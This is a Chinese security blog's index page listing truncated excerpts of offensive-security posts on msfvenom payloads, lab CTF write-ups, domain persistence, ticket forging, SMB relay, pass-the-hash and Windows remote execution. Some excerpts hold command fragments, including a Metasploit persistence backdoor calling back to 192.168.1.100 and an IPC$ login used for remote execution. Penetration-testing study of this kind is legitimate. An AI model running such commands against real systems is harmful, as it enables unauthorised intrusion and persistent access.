发表的所有文章 | CN-SEC 中文网

MSFvenom 几种不常见的 Payload 格式

msfvenom 中一些不那么常见的 payload 格式. powershell (ps1)用来生成方便在 powershell 脚本中调用的 shellcode 变量. [Byte[]] $buf...

12月15日安全博客12 views评论

阅读全文

安全博客

春秋云镜 Tsclient Writeup

春秋云镜 Tsclient Writeup flag01fscan $ fscan ./fscan_darwin_arm64 -h 39.99.141.107 ___ _ / _ \ ___ ___ ...

12月15日15 views评论

阅读全文

安全博客

春秋云镜 Initial Writeup

春秋云镜 Initial Writeup flag01入口点根据 favicon 和报错确定是 thinkphp 5.0.23 http://39.99.144.193/index.php?s=xx...

12月15日25 views评论

阅读全文

后渗透框架 PowerSploit

PowerSploit 是基于 PowerShell 的后渗透框架. 在功能上分为杀软绕过, 命令执行, 特权提升, 权限维持, 信息收集等模块及一些辅助性脚本. 限于篇幅, 仅针对常用脚本进行说明....

12月15日安全博客52 views评论

阅读全文

针对域环境的权限维持

域内环境中常用的维持权限的方式. 金银票据Golden and Silver Ticket. SID HistorySID History 为域内用户迁移到新域时针对用户权限的转移而提供的一种手段. ...

12月15日安全博客10 views评论

阅读全文

加载 PowerShell 脚本

通过 Module, IEX, Metasploit, Cobalt Strike 方式加载 PowerShell 脚本 Module通过导入模块的方式加载 PowerShell 脚本. Import...

12月15日安全博客17 views评论

阅读全文

Metasploit 常用维权方式

metasploit 后渗透常用的维持权限的方式. 注册表上传 vbs 开机自启 (被弃用). run persistence -r 192.168.1.100 -p 4444 -i 5 -P win...

12月15日安全博客23 views评论

阅读全文

Windows 单机权限维持

Windows 单机权限维持注册表上传 vbs 开机自启 (被弃用). run persistence -r 192.168.1.100 -p 4444 -i 5 -P windows/x64/me...

12月15日安全博客18 views评论

阅读全文

金银票据的利用

黄金票据利用 krbtgt 账户的 NTLM-Hash/AES-Key 伪造 TGT, 借此以访问域内所有资源. 白银票据利用服务账户的 NTLM-Hash/AES-Key 伪造 TGS Ticket...

12月15日安全博客19 views评论

阅读全文

安全博客

SMB 重放攻击

SMB 重放攻击原理以及利用方式原理可以看出, SMB 重放攻击的实质是 Client 本应该向 Attacker 请求的数据包被 Attacker 拿来以请求 Target. 重放在早期的 SM...

12月15日24 views评论

阅读全文

Mimikatz 哈希与票据传递

NTLM 协议以及 Mimikatz 哈希与票据传递 NTLM 协议A 想访问 B, 双方先确定协议版本(NTLM v1/NTLM v2). A 向 B 发送用户名信息, B 接受到用户名后用该用户的...

12月15日安全博客13 views评论

阅读全文

Windows 常用远程执行命令的手段

windows 下远程执行命令的一些方法. at历史久远. net use \\192.168.1.100\ipc$ 123456 /user:administrator at \\192.168.1...

12月15日安全博客17 views评论

阅读全文

MSFvenom 几种不常见的 Payload 格式

春秋云镜 Tsclient Writeup

春秋云镜 Initial Writeup

后渗透框架 PowerSploit

针对域环境的权限维持

加载 PowerShell 脚本

Metasploit 常用维权方式

Windows 单机权限维持

金银票据的利用

SMB 重放攻击

Mimikatz 哈希与票据传递

Windows 常用远程执行命令的手段

在线咨询

微信